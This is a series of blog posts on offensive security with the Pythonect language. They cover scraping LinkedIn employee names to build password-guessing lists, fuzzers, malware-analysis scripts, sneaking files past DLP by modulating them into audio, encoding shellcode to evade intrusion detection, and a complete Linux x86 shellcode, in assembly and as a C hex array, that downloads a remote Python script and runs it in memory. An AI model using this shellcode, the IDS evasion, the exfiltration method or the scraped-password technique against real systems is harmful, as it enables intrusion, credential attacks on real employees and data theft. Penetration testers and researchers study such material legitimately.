Tuesday, December 25, 2012

Scraping LinkedIn Public Profiles for Fun and Profit

Reconnaissance and Information Gathering is a part of almost every penetration testing engagement. Often, the tester will only perform network reconnaissance in an attempt to disclose and learn the company's network infrastructure (i.e. IP addresses, domain names, and etc), but there are other types of reconnaissance to conduct, and no, I'm not talking about dumpster diving. Thanks to social networks like LinkedIn, OSINT/WEBINT is now yielding more information. This information can then be used to help the tester test anything from social engineering to weak passwords.

In this blog post I will show you how to use Pythonect to easily generate potential passwords from LinkedIn public profiles. If you haven't heard about Pythonect yet, it is a new, experimental, general-purpose dataflow programming language based on the Python programming language. Pythonect is most suitable for creating applications that are themselves focused on the "flow" of the data. An application that generates passwords from the employees public LinkedIn profiles of a given company - have a coherence and clear dataflow:

(1) Find all the employees public LinkedIn profiles(2) Scrap all the employees public LinkedIn profiles(3) Crunch all the data into potential passwords

Now that we have the general concept and high-level overview out of the way, let's dive in to the details.

Finding all the employees public LinkedIn profiles will be done via Google Custom Search Engine, a free service by Google that allows anyone to create their own search engine by themselves. The idea is to create a search engine that when searching for a given company name - will return all the employees public LinkedIn profiles. How? When creating a Google Custom Search Engine it's possible to refine the search results to a specific site (i.e. 'Sites to search'), and we're going to limit ours to: linkedin.com. It's also possible to fine-tune the search results even further, e.g. uk.linkedin.com to find only employees from United Kingdom.

The access to the newly created Google Custom Search Engine will be made using a free API key obtained from Google API Console. Why go through the Google API? because it allows automation (No CAPTCHA's), and it also means that the search-result pages will be returned as JSON (as oppose to HTML). The only catch with using the free API key is that it's limited to 100 queries per day, but it's possible to buy an API key that will not be limited.

Scraping the profiles is a matter of iterating all over the hCards in all the search-result pages, and extracting the employee name from each hCard. Whats is a hCard? hCard is a micro format for publishing the contact details of people, companies, organizations, and places. hCard is also supported by social networks such as Facebook, Google+, LinkedIn and etc. for exporting public profiles. Google (when indexing) parses hCard, and when relevant, uses them in search-result pages. In other words, when search-result pages include LinkedIn public profiles, it will appear as hCards, and could be easily parsed.

Let's see the implementation of the above:
#!/usr/bin/python
#
# Copyright (C) 2012 Itzik Kotler
#
# scraper.py is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# scraper.py is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with scraper.py.  If not, see <http://www.gnu.org/licenses/>.

"""Simple LinkedIn public profiles scraper that uses Google Custom Search"""

import urllib
import simplejson


BASE_URL = "https://www.googleapis.com/customsearch/v1?key=<YOUR GOOGLE API KEY>&cx=<YOUR GOOGLE SEARCH ENGINE CX>"


def __get_all_hcards_from_query(query, index=0, hcards={}):

    url = query

    if index != 0:

        url = url + '&start=%d' % (index)

    json = simplejson.loads(urllib.urlopen(url).read())

    if json.has_key('error'):

        print "Stopping at %s due to Error!" % (url)

        print json

    else:

        for item in json['items']:

            try:

                hcards[item['pagemap']['hcard'][0]['fn']] = item['pagemap']['hcard'][0]['title']

            except KeyError as e:

                pass

        if json['queries'].has_key('nextPage'):

            return __get_all_hcards_from_query(query, json['queries']['nextPage'][0]['startIndex'], hcards)

    return hcards


def get_all_employees_by_company_via_linkedin(company):

    queries = ['"at %s" inurl:"in"', '"at %s" inurl:"pub"']

    result = {}

    for query in queries:

        _query = query % company

        result.update(__get_all_hcards_from_query(BASE_URL + '&q=' + _query))

    return list(result)
Replace <YOUR GOOGLE API KEY> and <YOUR GOOGLE SEARCH ENGINE CX> in the code above with your Google API Key and Google Search Engine CX respectively, save it to a file called scraper.py, and you're ready!

To kick-start, here is a simple program in Pythonect (that utilizes the scraper module) that searchs and prints all the Pythonect company employees full names:
"Pythonect" -> scraper.get_all_employees_by_company_via_linkedin -> print
The output should be:
Itzik Kotler
In my LinkedIn Profile, I have listed Pythonect as a company that I work for, and since no one else is working there, when searching for all the employees of Pythonect company - only my LinkedIn profile comes up.
For demonstration purposes I will keep using this example (i.e. "Pythonect" company, and "Itzik Kotler" employee), but go ahead and replace Pythonect with other, more popular, companies names and see the results.

Now that we have a working skeleton, let's take its output and start crunching it. Keep in mind that every "password generation forumla" is merely a guess. The examples below are only a sampling of what can be done. There are, obviously many more possibilities and you are encouraged to experiment. But first, let's normalize the output - this way it's going to be consistent before operations are performed on it:
"Pythonect" -> scraper.get_all_employees_by_company_via_linkedin -> string.lower(''.join(_.split()))
The normalization procedure is short and simple: convert the string to lowercase and remove any spaces, and so the output should be now:
itzikkotler
As for data manipulation, out of the box (Thanks to The Python Standard Library) we've got itertools and it's combinatoric generators. Let's start by applying itertools.product:
"Pythonect" -> scraper.get_all_employees_by_company_via_linkedin -> string.lower(''.join(_.split())) -> itertools.product(_, repeat=4) -> print
The code above will generate and print every 4 characters password from the letters: i, t, z, k, o, t, l , e, r. However, it won't cover passwords with uppercase letters in it. And so, here's a simple and straightforward implementation of a cycle_uppercase function that cycles the input letters yields a copy of the input with letter in uppercase:
def cycle_uppercase(i):
    s = ''.join(i)
    for idx in xrange(0, len(s)):
        yield s[:idx] + s[idx].upper() + s[idx+1:]
To use it, save it to a file called itertools2.py, and then simply add it to the Pythonect program after the itertools.product(_, repeat=4) block, as follows:
"Pythonect" -> scraper.get_all_employees_by_company_via_linkedin \
    -> string.lower(''.join(_.split())) \
        -> itertools.product(_, repeat=4) \
            -> itertools2.cycle_uppercase \
                -> print
Now, the program will also cover passwords that include a single uppercase letter in it. Moving on with the data manipulation, sometimes the password might contain symbols that are not found within the scrapped data. In this case, it is necessary to build a generator that will take the input and add symbols to it. Here is a short and simple generator implemented as a Generator Expression:
[_ + postfix for postfix in ['123','!','$']]
To use it, simply add it to the Pythonect program after the itertools2.cycle_uppercase block, as follows:
"Pythonect" -> scraper.get_all_employees_by_company_via_linkedin \
    -> string.lower(''.join(_.split())) \
        -> itertools.product(_, repeat=4) \
            -> itertools2.cycle_uppercase \
                -> [_ + postfix for postfix in ['123','!','$']] \
                    -> print
The result is that now the program adds the strings: '123', '!', and '$' to every generated password, which increases the chances of guessing the user's right password, or not, depends on the password :)

To summarize, it's possible to take OSINT/WEBINT data on a given person or company and use it to generate potential passwords, and it's easy to do with Pythonect. There are, of course, many different ways to manipulate the data into passwords and many programs and filters that can be used. In this aspect, Pythonect being a flow-oriented language makes it easy to experiment and research with different modules and programs in a "plug and play" manner.

Monday, September 17, 2012

Fuzzing Like A Boss with Pythonect

In my previous post Automated Static Malware Analysis with Pythonect, I wrote about how to use Pythonect to automate static malware analysis. In this post I'll describe how to use Pythonect and all of its perks to fuzz file formats, network protocols, and command line arguments. The examples provided are only a sampling of what can be done. There are, obviously many more possibilities and you are encouraged to experiment. Before you read this tutorial you should have at least a basic knowledge of Fuzz testing, Python and Pythonect (I recommend reading the Pythonect Tutorial: Learn By Example).

Let's see some code!
['A', 'a', '0', '!', '$', '%', '*', '+', ',', '-', '.', '/', ':', '?', '@', '^', '_'] \
    -> [_ * n for n in [256, 512, 1024, 2048, 4096]] \
        -> os.system('/bin/ping ' + _)
The code above tries to fuzz the command-line arguments of a *nix command-line tool (e.g. /bin/ping). Let's go line by line and explain what's going on with these 3 lines of code.

The first line defines a list of inputs to try (i.e. ['A', 'a', '0', ...]]), the second line defines a list of length parameters (i.e. [256, 512, 1024, ...]), and the last line executes the command-line tool with the generated argument as argv[1] (e.g. /bin/ping "AAAAAA ... 250 times"). In addition, this fuzzer is multi-threaded and uses asynchronous communication. What does it mean? It means that it's not waiting for a thread to finish before continuing with the loop, and as a result, it's not guaranteed to fuzz in sorted order (.e. A * 255, A * 512, A * 1024, ...)

You can easily extend the code above to include testing for format string vulnerabilities:
['%s', '%n', 'A', 'a', '0', '!', '$', '%', '*', '+', ',', '-', '.', '/', ':', '?', '@', '^', '_'] \
    -> [_ * n for n in [256, 512, 1024, 2048, 4096]] \
        -> os.system('/bin/ping ' + _)
If you want the format string testing inputs to run first (i.e. fuzz in sorted order), change the forward pipe operator from asynchronous to synchronous:
['%s', '%n', 'A', 'a', '0', '!', '$', '%', '*', '+', ',', '-', '.', '/', ':', '?', '@', '^', '_'] \
    | [_ * n for n in [256, 512, 1024, 2048, 4096]] \
        -> os.system('/bin/ping ' + _)
If you also want the length parameters to run in sorted order (i.e. '%s' * 256, '%s' * 512, '%s' * 1024, ...), change the 2nd forward pipe operator to synchronous as well:
['%s', '%n', 'A', 'a', '0', '!', '$', '%', '*', '+', ',', '-', '.', '/', ':', '?', '@', '^', '_'] \
    | [_ * n for n in [256, 512, 1024, 2048, 4096]] \
        | os.system('/bin/ping ' + _)
Keep in mind, that the latter is no longer multi-threaded (due to the fact that it's waiting for both, the inputs and length threads to finish).

Moving on, here is an example of a generic file format fuzzer:
open('dana.jpg', 'r').read() \
    -> itertools.permutations \
        -> open('output_' + hex(_.__hash__()) + '.jpg', 'w').write(''.join(_))
The code above reads the content of dana.jpg and passes it to itertools.permutations, and that in turn returns dana.jpg-length tuples, all possible orderings, no repeated elements.
Each dana.jpg-length tuple is saved into a unique output_ prefixed file. Afterwards, testing the JPEG libraries is as easy as: eog *.jpg or zgv *.jpg

This is another example of a generic file format fuzzer:
open('dana.jpg', 'r').read() \
    -> [list(_) + [os.urandom(1) for n in xrange(0, len(_))]] \
        -> [tuple(random.sample(_, len(_)/2)) for i in xrange(0, len(_)*2)] \
            -> open('output_' + hex(_.__hash__()) + '.jpg', 'w').write(''.join(_))
The code above reads the content of dana.jpg, generates a dana.jpg-length random bytes buffer, joins them, and then randomly samples dana.jpg-length*2 dana.jpg-length chunks.
Each dana.jpg-length chunk is saved into a unique output_ prefixed file. Again, testing the JPEG libraries is as easy as: eog *.jpg or zgv *.jpg

Last but not least, here's a network protocol (FTP) fuzzer:
ftplib.FTP('localhost') \
    -> _.login().startswith('230') \
    -> [_.mkd(s) for s in reduce(lambda x,y: x+y, map(lambda c: [chr(c) * 2**l for l in range(8,13)], xrange(1, 255)))]
The code above uses ftplib module to connect to a FTP site, logins as an anonymous, generates strings from byte value 1-255 * 256, 512 and etc. and passes each string as pathname for MKD.

Lastly, if you have suggestions on how we can make Pythonect better, head over to Pythonect's github page and create a new ticket or fork. Enjoy the examples and have fun with Pythonect!

Tuesday, August 21, 2012

Automated Static Malware Analysis with Pythonect

About 5 months ago I have released the first version of Pythonect - a new, experimental, general-purpose high-level dataflow programming language based on Python, written in Python.
It aims to combine the intuitive feel of shell scripting (and all of its perks like implicit parallelism) with the flexibility and agility of Python.

Crazy? Most definitely. And yet, strangely enough, it works!

Pythonect, being a dataflow programming language, treats data as something that originates from a source, flows through a number of processing components, and arrives at some final destination.
As such, it is most suitable for creating applications that are themselves focused on the "flow" of data. Perhaps the most readily available example of a dataflow-oriented applications comes from the realm of real-time signal processing, e.g. a video signal processor which perhaps starts with a video input, modifies it through a number of processing components (video filters), and finally outputs it to a video display.

As with video, malware analysis can be expressed as a network of different components such as: disassemblers, regular expressions, debuggers and etc. that are connected by a number of communication channels.
The benefits, and perhaps the greatest incentives, of expressing malware analysis this way is scalability and parallelism. The different components in the network can be maneuvered to create entirely unique dataflows without necessarily requiring the relationship to be hardcoded. Also, the design and concept of components make it easier to run on distributed systems and parallel processors.

In this tutorial I will show you how to automate static malware analysis using Pythonect. The examples will be simple enough that you can extend them if you want to.
Before you read this tutorial you should have at least a basic knowledge of x86 Assembly, Python, and Pythonect (I recommend reading the Pythonect Tutorial: Learn By Example).

Note: I have decided to go with static malware analysis because it's easier to demonstrate, and to use open source tools because they are more accessible. Nonetheless, this does not go to show that Pythonect or dataflow programming cannot be used to automate dynamic malware analysis, or integrated with a commercial software. The only limit is your imagination.

There isn't exactly a "Hello, world" program in the malware analysis realm, so I will start with my equivalent to "Hello, world", an example program that computes a MD5 digest of a file:
"MALWARE.EXE" -> os.system("/usr/bin/md5sum " + _)
The program above uses the md5sum program of GNU coreutils to compute and print MALWARE.EXE's MD5 digest. Let's extend it to compute the MALWARE.EXE's SHA1 digest as well:
"MALWARE.EXE" -> [os.system("/usr/bin/md5sum " + _), os.system("/usr/bin/sha1sum " + _)]
The new program above uses the md5sum and sha1sum of GNU coreutils to compute and print MALWARE.EXE's MD5 and SHA1 digests. Let's keep improving it:
sys.argv[1] -> [os.system("/usr/bin/md5sum " + _), os.system("/usr/bin/sha1sum " + _)]
Now, the new program reads the malware filename from a command-line argument. To run the script just save it (e.g. md5_and_sha1_sums) and run the Pythonect interpreter like this:
% /usr/local/bin/pythonect md5_and_sha1_sums /bin/ls
92385e9b8864032488e253ebde0534c3  /bin/ls
8800fee57584ed1c44b638225c2f1eec818a27c2  /bin/ls
Often, the goal is to handle the large volume of malware samples collected each day, let's change the program to work on all the executables (i.e. *.EXE) in the current directory:
glob.glob('*.EXE') -> [os.system("/usr/bin/md5sum " + _), os.system("/usr/bin/sha1sum " + _)]
Of course it can be further finetuned or customized at will. Also, it's worth mentioning that the program above is multi-threaded. Meaning, each file starts a new thread.

So far, I have used Python's os.system() function in all of the example programs. The os.system() is handy when it comes to writing small scripts, it executes a command in a subshell and returns it's exit status.
But since there is little interest in passing the exit status to another component, a different command executing function will be needed when building an advanced script. subprocess.check_output().
"MALWARE.EXE" -> subprocess.check_output(['/usr/bin/md5sum', _]) -> print
Much like the original example program, the program above uses the md5sum program of GNU coreutils to compute MALWARE.EXE's MD5 digest, but prints the result using Pythonect's print() function.

Moving on. The Python Standard Library is a rich set of libraries (modules and packages) for tackling just about every programming task. For example:
"MALWARE.EXE" -> open(_, 'r').read() -> hashlib.md5 -> _.hexdigest() -> print
The program above is an alternative to the original example program, it uses Python's hashlib.md5() module to compute and MALWARE.EXE's MD5 digest and Pythonect's print() to display it. What else?
"MALWARE.EXE" \
    -> open(_, 'r').read() \
    -> [re.finditer("\xcc", _), re.finditer("\xcd\x03", _)] \
    -> print "Found INT3 between Offset #%d and #%d" % _.span(0)
The program above searches for all the INT 3 instructions occurrences in MALWARE.EXE file, and prints the offsets of the beginning and end of each matched record.

Now, for the times when the Python Standard Library don't have what you looking for. You can always implement your own in Python:
import math

def entropy(data):
    entropy = 0
    if data:
        for x in range(2**8):
            p_x = float(data.count(chr(x))) / len(data)
            if p_x > 0:
                entropy += - p_x * math.log(p_x, 2)
    return entropy
The above is an implementation of Shannon's entropy equation in Python. To use it, simply save it (e.g. entropy.py), and reference it in a program:
"MALWARE.EXE" -> open(_, 'r').read() -> entropy.entropy -> print
The program above uses entropy() of entropy.py to measure and print MALWARE.EXE's entropy. To conclude this tutorial, let's tweak it one more time:
"MALWARE.EXE" -> subprocess.check_output(['/usr/bin/objcopy', '-O', 'binary', '-j', '.text', _, '/dev/stdout']) -> entropy.entropy -> print
Now, the program above uses entropy() of entropy.py to measure and print MALWARE.EXE's .text section (using objcopy of GNU binutils) entropy.

Pythonect is still under heavy development, there's a ton of unimplemented features and even more bugs. It's not ready for production yet, but you still can start to play with it and have plenty of fun!

That's all for now.

Sunday, July 8, 2012

Modulation and Data Loss Prevention (DLP) Solutions

Last year, my colleague Iftach (Ian) Amit and I gave a talk called 'Sounds Like Botnets' at DEFCON 19 and BSides Las Vegas conferences. Here is a link to the slides [PDF].
In the talk, we demonstrated how a combination of modulation and VoIP can be used to bypass enterprise security controllers. Here are the links to the poc #1, and poc #2.
This year, I won't be able to make it to Las Vegas for any of the conferences. Dwelling on the past, I have decided to revisit the 'Sounds Like Botnets' talk and add some content to it.

Data loss prevention (DLP) solutions are designed to detect and prevent potential data breach incidents. There are many types of DLP systems, the one that I'll address is the Endpoint DLP software.
Endpoint DLP software runs on an end-user workstations and monitors and controls access to physical devices (e.g. mobile devices) among other things. But does it monitor the sound card?
It is possible to modulate data into sound, and than to play it out from the workstation (using the sound card) to a 3rd party such as a voice recorder or any mobile with external microphone input.

Modulation vs. DLP #1:

Keep in mind that this is a proof of concept, so it's not going to work 100% of the time. If it's not working, try: (a) a smaller document/payload or (b) a different recording device.

To modulate:
  • Download data2sound.py
  • Pick a file
  • Modulate the file
  • $ ./data2sound.py -i secret.txt -o foobar.wav
  • Connect the recording device to the workstation sound card (Headphones output)
  • Start recording on the recording device
  • Play the generated WAV file (i.e. foobar.wav)
  • Stop the recording on the recording device
To demodulate:
  • Download sound2data.py

  • Then, if possible, copy the file "AS IT IS" from the recording device to the computer, and demodulate it:
    $ ./sound2data.py -i foobar.wav -o secret.txt
    If not, try the following steps:
    • Connect the recording device to the workstation sound card (Microphone input)
    • Start recording on the workstation
    • Play the file on the recording device
    • Stop the recording on the workstation
    • Demodulate the file
Try this (at home, and at your own risk) and post a comment with what file and sound card equipment you tried, and whether it worked for you or not. Now, the next method is really more theory than practice.

Modulation vs. DLP #2:

By bridging between the computer soundcard and a smart phone broadband modem, it is possible to upgrade the previous method to be an on-line, or real time one. In other words, Build Your Own Modem.

The setup:
  • Connect the computer headphone output into the smart phone external microphone input. This way, the computer can output signal to the smart phone.
  • Connect the smart phone headphone output into the computer external microphone input. This way, the smart phone can output signal to the computer.
This should (in theory) make sure that a signal can go from side to side. Now, let's see what each side should do.

On the smart phone:
  • Call to the remote site
  • (The caller signal should be sent to the computer via headphone output, if not, try playing with the settings)
  • (The calle signal should be received from the computer via microphone input, if not, try playing with the settings)
There's also the option of pairing (via Bluetooth) the computer and the smart phone: The computer identifies as a headset and gains access to smart phone speaker/microphone. But it's preventable by DLP.

On the computer:
  • Modulate the file you wish to trasnfer
  • Play the generated WAV file
That's the basic idea, of course, you can install a software on the computer which will modulate-demoulate (i.e. MODEM) on the fly, making it possible to get transmission from the remote site and respond to it.

Before wrapping up this post, I'd like to give a big shout out to Mickey Shaktov and Iftach (Ian) Amit, each of them will be presenting this year at Blackhat USA. Go see their talks, you won't be disappointed!

Saturday, June 23, 2012

Decoderless Shellcode Encoding

Today, it's almost impossible to send an unencoded exploit payload over the wire without triggering a Network Intrusion Prevention System (IPS) or Network Intrusion Detection System (NIDS) on the way.
The obvious solution is to encode the payload before sending it. A typical encoder yields a new payload that contains both, the old payload encoded and a decoder function to decode it.
Now, the encoded payload is "free" of any malicious patterns so it won't trigger any alarm, but what about the decoder? It becomes the weakest link and the new trigger for alarm.

Almost every encoding method requires a decoder to be embedded in the payload. The tricky part is how to encode the decoder so it won't trigger any alarm? And is it even possible?
The short answer is Yes, there are some ways to do it, one of them is instruction substitution. In other words, replacing an instruction with semantically equivalent, but different instruction.
But if instruction substitution is good enough for encoding decoders, is it not good enough for encoding the payload itself? Yes, it is good enough to encode the payload as well.
By applying instruction substitution on a payload, the result is, an encoded payload with no decoder in it. A decoderless encoded shellcode.

Let's take the following shellcode (execve "/bin/sh", 23 bytes) as an input:
.section .text
.global _start
_start:
    push $0xb
    popl %eax
    cdq
    push %edx
    push $0x68732f2f
    push $0x6e69622f
    mov %esp,%ebx
    push %edx
    push %ebx
    mov %esp, %ecx
    int $0x80
The first instruction is:
push $0xb
The goal of this instruction is to store the byte 0xB in the stack. One way to encode this instruction will be:
push $0xc
decb (%esp)
This way, the value (i.e. 0xB) is no longer visible. Another way to encode this instruction will be:
sub $0x4, %esp
movl $0xfffffff4, (%esp)
notl (%esp)
Here, the PUSH instruction is no longer visible. The reason I'm using 0xFFFFFFF4 (i.e. -12, ~0xB) and not 0xB is to avoid NULL bytes, but if NULL is not a problem then:
sub $0x4, %esp
movl $0x0000000b, (%esp)
Now, not only single instructions can be encoded. It's also possible to group a few instructions together and encode it. For example:
push $0xb
popl %eax
The goal of this instruction group is to store the value 0x0000000B in register EAX. One way to encode it will be:
movl $0xfffffff4, %eax
xorl %eax, $0xfff31337
This way, the value (i.e. 0xB, or 0x0000000B) is no longer visible. Another way to encode this instruction group will be:
pusha
movl $0xfffffff4, 0x1c(%esp)
notl 0x1c(%esp)
popa
Here, both, the referenced register (i.e. EAX) and the value (i.e. 0xB, or 0x0000000B) are not visible.
The advantage of this approach is that it can be recursive, each output can be used as input for another pass. For example:
push $0xb
Yields:
push $0xc
decb (%esp)
That can yield:
sub $0x4, %esp
movl $0xfffffff3, (%esp)
notl (%esp)
decb (%esp)
And so on.
The disadvantage of this approach is that it's not size-oriented (output might be bigger than input) and it will not work on all the instructions set (e.g. INT).

Several years ago I have developed and released a program in Python called shcfuscator (read: shellcode obfuscator) to automate this very process.
Shcfuscator takes an input assembly program in GAS syntax, substitutes popular instructions, and outputs an assembly program in GAS syntax.
Nothing much happened with it, and I didn't follow-up on it, until recently, when I thought about it again and decided to write this post.

So, if anybody is interested in porting it Metasploit as en encoder module, please let me know - I'd be happy to help out!

Following this legacy project, I have decided to open a repository for other legacy projects that I have developed in the early-mid 2000's

The repository can be found at: https://github.com/ikotler/tty64

I am not planning on maintain it, but nonetheless feel free free to fork.

Thursday, May 17, 2012

Linux/x86 Execve Python Interpreter with a Python Program Passed in as String Shellcode

About a month ago, Phrack magazine #68 was released and a linux x86 shellcode (bindshell-tcp-fork.s) that I wrote a few years ago got mentioned in one of the articles.
This made me feel nostalgic and I have decided to pack all the shellcodes that I have written over the years into a tarball (linux_x86_shellcodes.tar.gz) and re-publish it.
The feedback I got was great, and it inspired me to go and write a new shellcode. So, I did.
I have written a new linux x86 execve() shellcode that executes the Python interpreter with a Python program passed in as string.

Why calling Python and not /bin/sh you ask? Because Python script makes it easier to customize and/or automate a penetration testing (especially post exploitation).
Python is a cross-platform programming language with a decent standard library, and is known to run on almost any operating system or hardware platform.
A Python script can query the OS, CPU, HOSTNAME, and even IP address, and based on this information to call different functions and/or use different parameters.
Shell script, as good as it may be, is still dependent on various binaries to be installed beforehand to be able to run successfully. Also, shell scripts are not cross-platform.

Let's have a look on how it works. Here's the shellcode source code:
.section .text
.global _start
_start:
        push  $0xb
        pop   %eax
        cdq
        push  %edx
        push  $0x20292763
        push  $0x65786527
        push  $0x2c273e67
        push  $0x6e697274
        push  $0x733c272c
        push  $0x29286461
        push  $0x65722e29
        push  $0x2779702e
        push  $0x646c726f
        push  $0x776f6c6c
        push  $0x65682f32
        push  $0x34323834
        push  $0x3639322f
        push  $0x752f6d6f
        push  $0x632e786f
        push  $0x62706f72
        push  $0x642e6c64
        push  $0x2f2f3a70
        push  $0x74746827
        push  $0x286e6570
        push  $0x6f6c7275
        push  $0x2e326269
        push  $0x6c6c7275
        push  $0x28656c69
        push  $0x706d6f63
        push  $0x20636578
        push  $0x653b3262
        push  $0x696c6c72
        push  $0x75207472
        push  $0x6f706d69
        mov   %esp, %esi
        push  %edx
        pushw $0x632d
        mov   %esp, %ecx
        push  %edx
        push  $0x6e6f6874
        push  $0x79702f6e
        push  $0x69622f72
        push  $0x73752f2f
        mov   %esp,%ebx
        push  %edx
        push  %esi
        push  %ecx
        push  %ebx
        mov   %esp,%ecx
        int   $0x80
What the shellcode does is call execve() syscall with '/usr/bin/python' as the filename argument, and '-c' and a one-line Python program as the argv array argument.
There's no need for a cleanup code, as execve() does not return on success, and the text, data, bss, and stack of the calling process are overwritten by that of the program loaded.

Here is the Python one-line program source code:
import urllib2 ; exec compile(urllib2.urlopen('http://ikotler.org/helloworld.py').read(), '<string>', 'exec')
What the Python program does is import the urllib2 library and use it to retrieve a Python script from a remote Web server, and then compiles and executes it on the fly.
More to it, The retrieved Python script remains in memory the whole time. The Python program does all of the above without writing any data to the hard drive.

Here is the retrieved Python script (i.e. helloworld.py) source code:
print "Hello, world"
Depending on the nature of the retrieved Python script, it might be enough to just use eval() instead of exec and compile() combination in the one-line Python program.
In this case, print is a statement in Python 2.x and as such it can not be evaluated using eval(). in Python 3, print() is a function and can be evaluated using eval().
If in doubt, always use the exec and compile() combination.

To compile the shellcode source and test it:
$ as -o python-execve-urllib2-exec.o python-execve-urllib2-exec.s
$ ld -o python-execve-urllib2-exec python-execve-urllib2-exec.o
$ ./python-execve-urllib2-exec
The output should be:
Hello, world
Here is the shellcode represented as a hex string within a C program:
char shellcode[] =

        "\x6a\x0b"              // push  $0xb
        "\x58"                  // pop   %eax
        "\x99"                  // cdq
        "\x52"                  // push  %edx
        "\x68\x63\x27\x29\x20"  // push  $0x20292763
        "\x68\x27\x65\x78\x65"  // push  $0x65786527
        "\x68\x67\x3e\x27\x2c"  // push  $0x2c273e67
        "\x68\x74\x72\x69\x6e"  // push  $0x6e697274
        "\x68\x2c\x27\x3c\x73"  // push  $0x733c272c
        "\x68\x61\x64\x28\x29"  // push  $0x29286461
        "\x68\x29\x2e\x72\x65"  // push  $0x65722e29
        "\x68\x2e\x70\x79\x27"  // push  $0x2779702e
        "\x68\x6f\x72\x6c\x64"  // push  $0x646c726f
        "\x68\x6c\x6c\x6f\x77"  // push  $0x776f6c6c
        "\x68\x32\x2f\x68\x65"  // push  $0x65682f32
        "\x68\x34\x38\x32\x34"  // push  $0x34323834
        "\x68\x2f\x32\x39\x36"  // push  $0x3639322f
        "\x68\x6f\x6d\x2f\x75"  // push  $0x752f6d6f
        "\x68\x6f\x78\x2e\x63"  // push  $0x632e786f
        "\x68\x72\x6f\x70\x62"  // push  $0x62706f72
        "\x68\x64\x6c\x2e\x64"  // push  $0x642e6c64
        "\x68\x70\x3a\x2f\x2f"  // push  $0x2f2f3a70
        "\x68\x27\x68\x74\x74"  // push  $0x74746827
        "\x68\x70\x65\x6e\x28"  // push  $0x286e6570
        "\x68\x75\x72\x6c\x6f"  // push  $0x6f6c7275
        "\x68\x69\x62\x32\x2e"  // push  $0x696c6c72
        "\x68\x75\x72\x6c\x6c"  // push  $0x6c6c7275
        "\x68\x69\x6c\x65\x28"  // push  $0x28656c69
        "\x68\x63\x6f\x6d\x70"  // push  $0x706d6f63
        "\x68\x78\x65\x63\x20"  // push  $0x20636578
        "\x68\x62\x32\x3b\x65"  // push  $0x653b3262
        "\x68\x72\x6c\x6c\x69"  // push  $0x696c6c72
        "\x68\x72\x74\x20\x75"  // push  $0x75207472
        "\x68\x69\x6d\x70\x6f"  // push  $0x6f706d69
        "\x89\xe6"              // mov   %esp,%esi
        "\x52"                  // push  %edx
        "\x66\x68\x2d\x63"      // pushw $0x632d
        "\x89\xe1"              // mov   %esp,%ecx
        "\x52"                  // push  %edx
        "\x68\x74\x68\x6f\x6e"  // push  $0x6e6f6874
        "\x68\x6e\x2f\x70\x79"  // push  $0x79702f6e
        "\x68\x72\x2f\x62\x69"  // push  $0x69622f72
        "\x68\x2f\x2f\x75\x73"  // push  $0x73752f2f
        "\x89\xe3"              // mov   %esp,%ebx
        "\x52"                  // push  %edx
        "\x56"                  // push  %esi
        "\x51"                  // push  %ecx
        "\x53"                  // push  %ebx
        "\x89\xe1"              // mov   %esp, %ecx
        "\xcd\x80";             // int   $0x80

int main(int argc, char **argv) {
        int *ret;
        ret = (int *)&ret + 2;
        (*ret) = (int) shellcode;
}
Again, to run and test it is as easy as:
$ gcc -o python-execve-urllib2-exec python-execve-urllib2-exec.c
$ ./python-execve-urllib2-exec 
The output should be the same:
Hello, world
Now, I have also decided to open a GitHub repository to host the collection of shellcodes that I have written in the past, as well as any that I may write in the future.
I have committed both .S, and .C versions of this shellcode to it, as well as the rest of the shellcodes from the tarball.

The repository can be found at: https://github.com/ikotler/shellcode

Feel free to fork, and if you wish, to submit a pull-request and fix bug or suggest a change.